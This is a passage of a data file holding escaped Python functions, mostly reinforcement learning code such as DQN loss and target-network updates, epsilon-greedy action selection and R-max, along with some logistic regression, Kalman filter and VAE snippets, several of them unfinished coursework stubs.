\"Recovering with findYeOfMinAbsMunu, answer: %s\" % currentYe\n #print \"currentYe: \", currentYe, \"\\tcurrentT: \", currentSolveVar\n\n yeError = relativeError(currentYe, previousYe)\n solveVarError = relativeError(currentSolveVar, previousSolveVar)\n iteration += 1\n #print \"errs: \", yeError, solveVarError\n\n newDict = pointDict.copy()\n newDict['ye'] = currentYe\n temp = numpy.power(10.0,currentSolveVar) # TODO TEMP HARD CODE\n newDict['temp'] = temp\n self.setState(newDict)\n return currentYe, temp # TODO TEMP HARD CODE", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def train_step(self, experiences, gamma):\n states = experiences['states']\n rewards = experiences['rewards']\n actions = experiences['actions']\n next_states = experiences['next_states']\n dones = experiences['dones']\n q_values = self.main_network(states).gather(1, actions.view(-1, 1)).squeeze()\n\n # Get max predicted Q values (for next states) from target model\n next_q_values = self.target_network(next_states).detach().max(1)[0]\n\n # Compute Q targets for current states\n expected_q_value = rewards + (gamma * next_q_values * (1 - dones))\n\n # Compute loss\n loss = F.mse_loss(q_values, expected_q_value)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # Update the target network\n self.soft_update(self.main_network, self.target_network, TAU)", "def back_prop(net, input_values, desired_output, r=1, minimum_accuracy=-0.001):\n raise NotImplementedError", "def mc_glie(env, iterations=1000, gamma=0.9):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n n_visits = np.zeros((nS, nA))\n policy = np.ones((env.nS,env.nA))/env.nA # initially all actions are equally likely\n epsilon = 1\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n start = time.time() # to time how long convergence takes\n print(\"---Monte Carlo First Visit---\\nTraining Started.\")\n # policy = epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon)\n k = 1\n while k < iterations:\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n \n Q_value, n_visits = mc_policy_evaluation(env, policy, Q_value, n_visits, gamma=0.9) # evaluate using Monte Carlo First Visit\n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"n_visits = {0}\".format(n_visits))\n k += 1\n epsilon = 1/k # update epsilon\n policy = epsilon_greedy_policy_improve(Q_value, nS, nA, epsilon) # Improve policy using epsilon-greedy\n\n # print(\"Policy = {0}\".format(policy))\n # print(\"---\")\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n\n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def _build_algorithm(self):\n self.optimizer = tf.train.AdamOptimizer(self._lr, epsilon=1.5e-8)\n trainable_variables = tf.trainable_variables(\"main/qnet\")\n\n # Compute the state value.\n batch_size = tf.shape(self._observation)[0]\n action_index = tf.stack([tf.range(batch_size), self._action], axis=1)\n action_q = tf.gather_nd(self._qvals, action_index)\n assert_shape(action_q, [None])\n\n # Compute back up.\n ave_q = tf.add_n(self._target_qvals) / self._n_net\n assert_shape(tf.reduce_max(ave_q, axis=1), [None])\n q_backup = tf.stop_gradient(self._reward + self._discount * (1 - self._done) * tf.reduce_max(ave_q, axis=1))\n\n # Compute loss and optimize the object.\n loss = tf.reduce_mean(tf.squared_difference(q_backup, action_q)) # 损失值。\n self._train_op = self.optimizer.minimize(loss, var_list=trainable_variables)\n\n # Update target network.\n update_target_operation = []\n for i in reversed(range(1, self._n_net)): # i=0表示最近的模型。\n with tf.control_dependencies(update_target_operation):\n update_target_operation.append(self._update_target(f\"target_{i}/qnet\", f\"target_{i-1}/qnet\"))\n\n with tf.control_dependencies(update_target_operation):\n update_target_operation.append(self._update_target(\"target_0/qnet\", \"main/qnet\"))\n\n self.update_target_op = update_target_operation\n self._log_op = {\"loss\": loss}", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.self_state.v_pref)\n\n occupancy_maps = None\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n self.action_values = list()\n max_value = float('-inf')\n max_action = None\n for action in self.action_space:\n next_self_state = self.propagate(state.self_state, action)\n if self.query_env:\n next_human_states, reward, done, info = self.env.onestep_lookahead(action)\n else:\n next_human_states = [self.propagate(human_state, ActionXY(human_state.vx, human_state.vy))\n for human_state in state.human_states]\n reward = self.compute_reward(next_self_state, next_human_states)\n batch_next_states = torch.cat([torch.Tensor([next_self_state + next_human_state]).to(self.device)\n for next_human_state in next_human_states], dim=0)\n rotated_batch_input = self.rotate(batch_next_states).unsqueeze(0)\n if self.with_om:\n if occupancy_maps is None:\n occupancy_maps = self.build_occupancy_maps(next_human_states).unsqueeze(0)\n rotated_batch_input = torch.cat([rotated_batch_input, occupancy_maps], dim=2)\n # VALUE UPDATE\n next_state_value = self.model(rotated_batch_input).data.item()\n # value = reward + pow(self.gamma, self.time_step * state.self_state.v_pref) * next_state_value\n if self.kinematics == \"holonomic\":\n v = np.linalg.norm(np.array(action))\n value = reward + pow(self.gamma, self.time_step * v) * next_state_value\n else:\n value = reward + pow(self.gamma, self.time_step * action[0]) * next_state_value\n self.action_values.append(value)\n if value > max_value:\n max_value = value\n max_action = action\n \n if max_action is None:\n raise ValueError('Value network is not well trained. ')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n # print(\"Action:V:%f,\\tR:%f\\t\"%(max_action.v, max_action.r))\n return max_action", "def _build_target_quantile_values_op(self):\n batch_size = tf.shape(self._replay.rewards)[0]\n ###### Munchausen-specific\n replay_action_one_hot = tf.one_hot(\n self._replay.actions, self.num_actions, 1., 0., name='action_one_hot')\n # tau * ln pi_k+1 (s')\n replay_next_log_policy = utils.stable_scaled_log_softmax(\n self._replay_next_target_q_values, self.tau, axis=1)\n # tau * ln pi_k+1(s)\n replay_log_policy = utils.stable_scaled_log_softmax(\n self._replay_target_q_values, self.tau, axis=1)\n replay_next_policy = utils.stable_softmax( # pi_k+1(s')\n self._replay_next_target_q_values, self.tau, axis=1)\n\n tau_log_pi_a = tf.reduce_sum( # ln pi_k+1(a|s)\n replay_log_policy * replay_action_one_hot, axis=1)\n\n tau_log_pi_a = tf.clip_by_value(\n tau_log_pi_a, clip_value_min=self.clip_value_min, clip_value_max=0)\n\n munchuasen_term = self.alpha * tau_log_pi_a\n #########\n\n # Shape of rewards: (num_tau_prime_samples x batch_size) x 1.\n rewards = self._replay.rewards[:, None] + munchuasen_term[Ellipsis, None]\n rewards = tf.tile(rewards, [self.num_tau_prime_samples, 1])\n\n is_terminal_multiplier = 1. - tf.cast(self._replay.terminals, tf.float32)\n # Incorporate terminal state to discount factor.\n # size of gamma_with_terminal: (num_tau_prime_samples x batch_size) x 1.\n gamma_with_terminal = self.cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = tf.tile(gamma_with_terminal[:, None],\n [self.num_tau_prime_samples, 1])\n\n # shape: (batch_size * num_tau_prime_samples) x num_actions\n replay_next_policy_ = tf.tile(replay_next_policy,\n [self.num_tau_prime_samples, 1])\n replay_next_log_policy_ = tf.tile(replay_next_log_policy,\n [self.num_tau_prime_samples, 1])\n\n # shape: (batch_size * num_tau_prime_samples) x 1\n replay_quantile_values = tf.reshape(\n self._replay_net_target_quantile_values,\n [batch_size * self.num_tau_prime_samples, self.num_actions])\n\n # shape: (batch_size * num_tau_prime_samples) x num_actions\n weighted_logits = (\n replay_next_policy_ * (replay_quantile_values\n - replay_next_log_policy_))\n\n # shape: (batch_size * num_tau_prime_samples) x 1\n target_quantile_values = tf.reduce_sum(weighted_logits, axis=1,\n keepdims=True)\n\n return rewards + gamma_with_terminal * target_quantile_values", "def learn(self, memory: ReplayMemory, batch_size: int) -> float:\n # 从replay buffer当中采样,从经验回放集合中采样batch_size个样本,计算当前目标Q值\n indices, (state_batch, next_batch, action_batch, reward_batch, done_batch), is_weights = \\\n memory.sample(batch_size)\n # 使用行为网络计算值函数 Q_j\n values = self.__policy(state_batch).gather(1, action_batch)\n \n expected = []\n policy_Q_batch = self.__policy(next_batch).cpu().data.numpy()\n max_action_next = np.argmax(policy_Q_batch, axis=1)\n target_Q_batch = self.__target(next_batch)\n \n for i in range(batch_size):\n if done_batch[i]:\n expected.append(reward_batch[i])\n else:\n target_Q_value = target_Q_batch[i, max_action_next[i]]\n expected.append(reward_batch[i] + self.__gamma * target_Q_value)\n \n expected = torch.stack(expected)\n TD_error = torch.abs(expected - values)\n memory.update(indices, TD_error)\n \n # 根据目标函数 (Q_j - expected)^2来梯度下降\n loss = (torch.FloatTensor(is_weights).to(self.__device) * F.mse_loss(values, expected)).mean()\n\n self.__optimizer.zero_grad()\n loss.backward()\n for param in self.__policy.parameters():\n param.grad.data.clamp_(-1, 1)\n self.__optimizer.step()\n\n return loss.item()", "def rmax(env, gamma, m, R_max, epsilon, num_episodes, max_step = 6):\n\n Q = np.ones((env.nS, env.nA)) * R_max / (1 - gamma)\n R = np.zeros((env.nS, env.nA))\n nSA = np.zeros((env.nS, env.nA))\n nSASP = np.zeros((env.nS, env.nA, env.nS))\n ########################################################\n # YOUR CODE HERE #\n ########################################################\n\n # Generate episodes\n average_scores = []\n accum = 0.0\n term = int(np.log(1 / (epsilon * (1 - gamma))) / (1 - gamma))\n for i in xrange(num_episodes):\n S = env.reset()\n done = False\n episode_reward = 0.0\n n_steps = 0\n\n while not done:\n\n if n_steps >= max_step:\n break\n\n A = np.argmax([Q[S,a] for a in range(env.nA)])\n\n # Make an action\n nextS, reward, done, _ = env.step(A)\n episode_reward += reward\n\n # R-Max\n if nSA[S, A] < m:\n nSA[S, A] += 1\n R[S, A] += reward\n nSASP[S, A, nextS] += 1\n\n if nSA[S, A] == m:\n for j in range(term):\n for S_bar in range(env.nS):\n for A_bar in range(env.nA):\n if nSA[S_bar, A_bar] >= m:\n N = float(nSA[S_bar, A_bar])\n T_hat = nSASP[S_bar, A_bar, :] / N\n R_hat = R[S_bar, A_bar] / N\n Q[S_bar, A_bar] = R_hat\n Q[S_bar, A_bar] += gamma * np.sum(T_hat * np.max(Q, axis=1))\n\n\n # Update Q-value\n S = nextS\n n_steps += 1\n\n accum += episode_reward\n average_scores.append(accum/(i+1))\n\n plt.plot(average_scores[:10000], label=\"m=%d\"%(m))\n\n ########################################################\n # END YOUR CODE #\n ########################################################\n return Q", "def fit(self, x, y):\n def initiate_theta(dim):\n self.theta = np.zeros(dim)\n # print('self.theta initiated is {}'.format(self.theta))\n \n def implement_sigmoid(x):\n if self.theta is None:\n initiate_theta(x.shape[1])\n z = np.matmul(np.transpose(self.theta), np.transpose(x))\n return 1/(np.ones(x.shape[0]) + np.exp(-z))\n \n def implement_partial_loss(x, y):\n return -np.matmul(np.transpose(y - implement_sigmoid(x)), x)/x.shape[0]\n \n def implement_transposed_hess(x):\n sigmoid_hadamard = implement_sigmoid(x) * (np.ones(x.shape[0]) - implement_sigmoid(x))\n hess2 = np.diag(sigmoid_hadamard)\n hess = np.matmul(hess2,x)\n hess = np.matmul(np.transpose(x),hess)/x.shape[0]\n hess_inverse = np.linalg.inv(hess)\n return hess_inverse\n \n def train(x, y):\n count = 0\n if self.theta is None:\n initiate_theta(x.shape[1])\n while count < self.max_iter:\n if self.verbose:\n loss_y1 = np.matmul(np.transpose(y), np.log(implement_sigmoid(x)))\n loss_y0 = np.matmul(np.transpose(np.ones(x.shape[0]) - y), np.log(np.ones(x.shape[0]) - implement_sigmoid(x)))\n loss = -(loss_y1 + loss_y0 )/x.shape[0]\n print('Average empirical loss for step {} is {}'.format(count, loss))\n delta = np.matmul(implement_transposed_hess(x), implement_partial_loss(x, y))\n new_theta = self.theta - delta * self.step_size\n delta_theta = np.linalg.norm(new_theta - self.theta)\n # print('delta is {}'.format(delta_theta))\n if delta_theta < self.eps:\n return new_theta\n else:\n self.theta = new_theta\n count += 1\n return self.theta\n \n return train(x, y)", "def algorithm(self):\n convergence_threshold = 50\n reward_num_threshold = 300\n alpha = 1\n gamma = 0.5\n while (self.reward_num < reward_num_threshold) and (self.count<convergence_threshold):\n print('------')\n print('Iteration', self.reward_num, '/', reward_num_threshold)\n print('Iterations w/out Q-update:', self.count, '/', convergence_threshold)\n # select a possible action (any of them; all are valid)\n s = self.get_state_num()\n print(\"Initial state:\", s)\n a = random.choice(np.arange(3))\n self.apply_action(a)\n while self.reward == None:\n #print(\"Sleeping to wait for reward\")\n rospy.sleep(0.5)\n reward = self.reward\n print(\"REWARD =\", reward)\n self.reward = None\n if reward == 0:\n next_state = self.get_state_num()\n mx = np.amax(self.Q[next_state])\n else:\n ## There is no next state if nonzero reward seen\n mx = 0\n update = self.Q[s][a] + alpha*(reward+gamma*mx-self.Q[s][a])\n if self.Q[s][a] != update:\n print(\"Update Q matrix\")\n self.Q[s][a] = update\n self.count = 0\n else:\n self.count += 1\n\n print(\"Finished calculating Q-Matrix\\n\\n\\n\\n\\n\\n\\n\")", "def predict(self, u):\n\n dtheta_l = self.current_state_estimate[0,0]\n dtheta_r = self.current_state_estimate[1,0]\n v = self.current_state_estimate[2,0]\n w = self.current_state_estimate[3,0]\n x = self.current_state_estimate[4,0]\n y = self.current_state_estimate[5,0]\n theta = self.current_state_estimate[6,0]\n vl = u[0,0]\n vr = u[1,0]\n \n # Vary noise with input voltage\n if abs(self.current_state_estimate[0,0]) < .03:\n self.Q[0,0] = .0000001\n dtheta_l = 0\n\n else:\n self.Q[0,0] = abs(vl)*.03/3000+.03\n\n if abs(self.current_state_estimate[1,0]) < .03:\n self.Q[1,1] = .0000001\n dtheta_r = 0\n else:\n self.Q[1,1] = abs(vr)*.03/3000+.03\n\n ## TRANSITION ESTIMATE\n self.current_state_estimate[0] += self.dt*(self.k2_l*dtheta_l + self.k1_l*vl)\n self.current_state_estimate[1] += self.dt*(self.k2_r*dtheta_r + self.k1_r*vr)\n self.current_state_estimate[2] = self.r/2 * (self.current_state_estimate[0] + self.current_state_estimate[1])\n self.current_state_estimate[3] = self.r/self.l * (self.current_state_estimate[1] - self.current_state_estimate[0])\n self.current_state_estimate[4] += (self.dt)*self.current_state_estimate[2]*math.cos(theta)\n self.current_state_estimate[5] += (self.dt)*self.current_state_estimate[2]*math.sin(theta)\n self.current_state_estimate[6] += (self.dt)*self.current_state_estimate[3]\n \n ## TRANISTION PROBABILITY\n # only propogate the things that can move\n self.A[0:7, 0:7] = np.array([[1+self.dt*self.k2_l, 0, 0, 0, 0, 0, 0],\\\n [0, 1+self.dt*self.k2_r, 0, 0, 0, 0, 0],\\\n [self.r/2, self.r/2, 0, 0, 0, 0, 0],\\\n [-self.r/self.l, self.r/self.l, 0, 0, 0, 0, 0],\\\n [0, 0, math.cos(theta)*self.dt , 0, 1, 0, -v*math.sin(theta)*self.dt],\\\n [0, 0, math.sin(theta)*self.dt , 0, 0, 1, v*math.cos(theta)*self.dt],\\\n [0, 0, 0, self.dt, 0, 0, 1]])\n \n self.current_prob_estimate = np.dot(np.dot(self.A, self.current_prob_estimate), np.transpose(self.A)) + self.Q", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n Q_Value = 0 #initializing q value\n\n feat_Extractor = self.featExtractor\n\n weight = self.weights #To get the weight to control exploration and exploitation\n\n features = feat_Extractor.getFeatures(state,action) #to get all the features associated with (state,action) pair\n\n for each_feature in features:\n #refer to README_Reinforcement.txt for the formula at line 11\n temp_Qvalue = weight[each_feature] * features[each_feature] #Q(state,action) = w * featureVector where * is the dotProduct operator\n Q_Value = Q_Value + temp_Qvalue\n\n return Q_Value #Returns final qvalue\n #util.raiseNotDefined()", "def learn(self, experiences, gamma):\n states_and_prev_recurrents, actions, recurrents, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n next_states_and_recurrents = torch.cat([next_states, recurrents], dim=1)\n Q_targets_next = self.qnetwork_target(next_states_and_recurrents).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states_and_prev_recurrents).gather(1, actions)\n\n # Compute loss\n loss_rl = F.mse_loss(Q_expected, Q_targets)\n\n states = states_and_prev_recurrents[:, :8]\n target_recurrents = map_observation_to_recurrent_state(states)\n recurrent_pred = self.qnetwork_local(states_and_prev_recurrents)[:, -5:]\n\n loss_internal_states = F.multilabel_soft_margin_loss(recurrent_pred, target_recurrents)\n\n loss = loss_rl + loss_internal_states\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones, indices = experiences\n\n # Get max predicted Q values (for next states) from target model\n if self.dbl_dqn:\n local_best_actions = self.qnetwork_local(next_states).detach().argmax(1)\n Q_next_states = self.qnetwork_target(next_states)\n Q_targets_next = Q_next_states.gather(1, local_best_actions.unsqueeze(1))\n else:\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n\n # Compute Q targets for current states\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n if self.priority_rpl:\n errors = abs(Q_expected - Q_targets)\n self.memory.update_priorities(indices, errors)\n importance = self.memory.get_importance(indices, self.a, self.b)\n importance = np.array(importance)\n loss = torch.mean(torch.mul(errors.float(), torch.from_numpy(importance).float().to(device)))\n else:\n loss = F.mse_loss(Q_expected, Q_targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()", "def __call__(self): \n m = np.zeros((len(self.observation),))\n k = np.zeros((len(self.observation), len(self.prior)))\n \n sv = self.stateVector\n m = sv[0] * np.exp(-(self.independentVariable/sv[1])) + sv[2]\n \n k[:, 0] = np.exp(-(self.independentVariable/sv[1]))\n k[:, 1] = (sv[0] * self.independentVariable * \n np.exp(-(self.independentVariable/sv[1]))/(sv[1])**2)\n k[:, 2] = np.ones((len(self.observation),))\n \n self.modelCalculation, self.Jacobian = m, k\n \n return m, k", "def get_action_value(mdp, state_values, state, action, gamma):\n\n Q = 0\n # YOUR CODE HERE\n return Q", "def compute_output_delta(self, target):\r\n self.compute_activation\r\n out=self.activation\r\n self.delta=out*(1-out)*(target-out)", "def learn(self):\n batch = self.agent.replay_buffer.sample(self.batch_size)\n states = torch.tensor([x.state for x in batch], dtype=torch.float32).to(self.agent.device) # shape == (batch_size, 3, 6, 7)\n actions = [x.action for x in batch]\n rewards = torch.tensor([x.reward for x in batch], dtype=torch.float32).to(self.agent.device)\n next_states = torch.tensor([x.next_state for x in batch], dtype=torch.float32).to(self.agent.device)\n dones = [x.done for x in batch]\n\n self.optimizer.zero_grad()\n\n\n q_vals = self.agent.policy_net(states)[range(len(actions)), actions] # Q vals for actions taken\n q_next_vals = self.agent.target_net(next_states).detach() # we don't care about grad wrt target net\n q_next_vals[dones] = 0.0 # terminal states have no future expected value\n q_targets = rewards + self.gamma * torch.max(q_next_vals, dim=1)[0]\n\n # all_q_vals = self.agent.policy_net(states)\n # print()\n # print('actions')\n # print(actions)\n # print()\n # print('original all q vals')\n # print(self.agent.policy_net(states)) \n # print(self.agent.policy_net(states).shape)\n # print()\n # print('QVALS:', q_vals)\n # print(q_vals.shape)\n # print('\\n\\n')\n # print('QTARGETS:', q_targets)\n # print(q_targets.shape)\n\n # breakpoint()\n\n loss = self.loss_fn(q_targets, q_vals).to(self.agent.device)\n loss.backward()\n \n # for layer in self.agent.policy_net.named_parameters():\n \n # # print(f'layer: {layer[0]}')\n # # print(f'grad:', layer[1].grad)\n\n # # print('loss', loss)\n # # print('q_vals grad:', q_vals.grad)\n # # print('states:', )\n\n self.optimizer.step()\n\n self.agent.learning_iters += 1\n if self.agent.learning_iters % self.target_update_freq == 0:\n self.agent.update_target_net()\n # logger.info('Updated target net')", "def model(X_train, Y_train, X_test, Y_test, num_iterations, learning_rate, print_cost):\n\n\n # initialize parameters with zeros\n w, b = initialize_with_zeros(X_train.shape[0]);\n\n print(\"w.shape() = \" +str(w.shape)+ \", b = \" +str(b));\n\n # Gradient descent\n parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost);\n \n # Retrieve parameters w and b from dictionary \"parameters\"\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n # Predict test/train set examples \n Y_prediction_test = predict(w, b, X_test)\n Y_prediction_train = predict(w, b, X_train)\n\n # Print train/test Errors\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n \n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test, \n \"Y_prediction_train\" : Y_prediction_train, \n \"w\" : w,\n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n \n return d", "def calculateTarget(self, qValuesNewState, reward, isFinal):\n if isFinal:\n return reward\n else :\n return reward + self.discountFactor * self.getMaxQ(qValuesNewState)", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones = experiences\n # print('learn states.shape', states.shape)\n # print('learn next_states.shape', next_states.shape)\n \n q_expected, q_targets = self.get_target_and_expected(states, \n actions, \n rewards, \n next_states, \n dones, \n gamma)\n\n\n # Compute loss\n loss = F.mse_loss(q_expected, q_targets)\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def get_optimal_beta(self):\n if self.annealing:\n # find the epoch/index that had the highest NDCG@k value\n index_max_ndcg = np.argmax(self.val_ndcg)\n\n # using this index find the value that beta had at this epoch\n return self.ls_beta[index_max_ndcg]\n else:\n return self.beta", "def evaluate(self, X, y):\n\n inputs = np.concatenate((X,-np.ones((np.shape(X)[0],1))),axis=1)\n outputs = self.forwardPass(inputs)\n nclasses = np.shape(y)[1]\n\n # 1-of-N encoding\n outputs = np.argmax(outputs,1)\n targets = np.argmax(y,1)\n\n cm = np.zeros((nclasses,nclasses))\n for i in range(nclasses):\n for j in range(nclasses):\n cm[i,j] = np.sum(np.where(outputs==i,1,0)*np.where(targets==j,1,0))\n\n print(\"The confusion matrix is:\")\n print(cm)\n self.accuracy = np.trace(cm)/np.sum(cm)*100\n print(\"The accuracy is \",np.trace(cm)/np.sum(cm)*100)", "def epoch(self):\n old_vals = (self._controller.kp, self._controller.ki, self._controller.kd)\n gamma = 0.01\n grad = self._get_gradient()\n\n new_vals = [p - gamma*g for p, g in zip(old_vals, grad)]\n\n self._controller.kp = new_vals[0] if new_vals[0] > 0 else 0\n self._controller.ki = new_vals[1] if new_vals[1] > 0 else 0\n self._controller.kd = new_vals[2] if new_vals[2] > 0 else 0", "def optimize(self):\n \n # converting from batch to local quantities\n if self.dispersion == \"gene-batch\":\n local_dispersion = tf.matmul(self.batch, tf.exp(self.px_r))\n else: \n local_dispersion = tf.exp(self.px_r)\n \n if self.library_mode == \"numeric\":\n local_l_mean = self.library_size_mean\n local_l_var = self.library_size_var\n else:\n local_l_mean = tf.matmul(self.batch, self.library_size_mean)\n local_l_var = tf.matmul(self.batch, self.library_size_var)\n \n \n # VAE loss\n if self.zi:\n recon = log_zinb_positive(self.expression, self.px_rate, local_dispersion, \\\n self.px_dropout)\n else:\n recon = log_nb_positive(self.expression, self.px_rate, local_dispersion)\n \n kl_gauss_z = 0.5 * tf.reduce_sum(\\\n tf.square(self.qz_m) + self.qz_v - tf.log(1e-8 + self.qz_v) - 1, 1)\n\n if self.scalings:\n kl_gauss_l = 0.5 * tf.reduce_sum(\\\n tf.square(self.ql_m - local_l_mean) / local_l_var \\\n + self.ql_v / local_l_var \\\n + tf.log(1e-8 + local_l_var) - tf.log(1e-8 + self.ql_v) - 1, 1)\n \n if self.scalings:\n self.ELBO_gau = tf.reduce_mean(recon - self.kl_scale * kl_gauss_z - kl_gauss_l)\n else:\n self.ELBO_gau = tf.reduce_mean(recon - self.kl_scale * kl_gauss_z)\n \n # MMD loss\n if self.apply_mmd:\n self.mmd = mmd_objective(self.z, self.batch_ind, self.num_batches)\n self.loss = - self.ELBO_gau + self.mmd_scale * self.mmd\n \n else:\n self.loss = - self.ELBO_gau\n \n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer = self.optimize_algo\n with tf.control_dependencies(update_ops):\n self.train_step = optimizer.minimize(self.loss)", "def DRate_j(eta,Pap,Pec,exp_loss_jt):\n return (1 + Pap)*(1 - (1 - 2*Pec)*exp_loss_jt)", "def learn(self, experiences, gamma):\n \n states, actions, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n loss = F.mse_loss(Q_expected, Q_targets)\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU)", "def ground_state(self) -> numpy.ndarray:\n # Optimal cost\n cost_min = min(self.cost)\n # Find the args that corresponds to the optimal cost\n args = numpy.where(self.cost == cost_min)\n # Create the ideal state\n rho = numpy.zeros(2**self.num_nodes)\n for arg in args[0]:\n rho[arg] = 1\n return rho / numpy.sum(rho)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def calc_q_values(self, state):\n state = state[None, :, :, :]\n return self.q_network.predict_on_batch(state)", "def compute_td_loss(states, actions, rewards, next_states, is_done,\n agent, target_network,\n gamma=0.99,\n check_shapes=False,\n device=device):\n states = torch.tensor(states, device=device, dtype=torch.float32) # shape: [batch_size, *state_shape]\n actions = torch.tensor(actions, device=device, dtype=torch.int64) # shape: [batch_size]\n rewards = torch.tensor(rewards, device=device, dtype=torch.float32) # shape: [batch_size]\n # shape: [batch_size, *state_shape]\n next_states = torch.tensor(next_states, device=device, dtype=torch.float)\n is_done = torch.tensor(\n is_done.astype('float32'),\n device=device,\n dtype=torch.float32,\n ) # shape: [batch_size]\n is_not_done = 1 - is_done\n\n # get q-values for all actions in current states\n predicted_qvalues = agent(states) # shape: [batch_size, n_actions]\n\n # compute q-values for all actions in next states\n predicted_next_qvalues = target_network(next_states) # shape: [batch_size, n_actions]\n \n # select q-values for chosen actions\n predicted_qvalues_for_actions = predicted_qvalues[range(len(actions)), actions] # shape: [batch_size]\n\n # compute V*(next_states) using predicted next q-values\n next_state_values = <YOUR CODE>\n\n assert next_state_values.dim() == 1 and next_state_values.shape[0] == states.shape[0], \"must predict one value per state\"\n\n # compute \"target q-values\" for loss - it's what's inside square parentheses in the above formula.\n # at the last state use the simplified formula: Q(s,a) = r(s,a) since s' doesn't exist\n # you can multiply next state values by is_not_done to achieve this.\n target_qvalues_for_actions = <YOUR CODE>\n\n # mean squared error loss to minimize\n loss = torch.mean((predicted_qvalues_for_actions - target_qvalues_for_actions.detach()) ** 2)\n\n if check_shapes:\n assert predicted_next_qvalues.data.dim() == 2, \"make sure you predicted q-values for all actions in next state\"\n assert next_state_values.data.dim() == 1, \"make sure you computed V(s') as maximum over just the actions axis and not all axes\"\n assert target_qvalues_for_actions.data.dim() == 1, \"there's something wrong with target q-values, they must be a vector\"\n\n return loss", "def best_params(self):\n return self.X[np.argmax(self.y.numpy())]", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones, idxs, weights = experiences\n \n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(next_states).detach().max(1)[0].unsqueeze(1)\n # Compute Q targets for current states \n 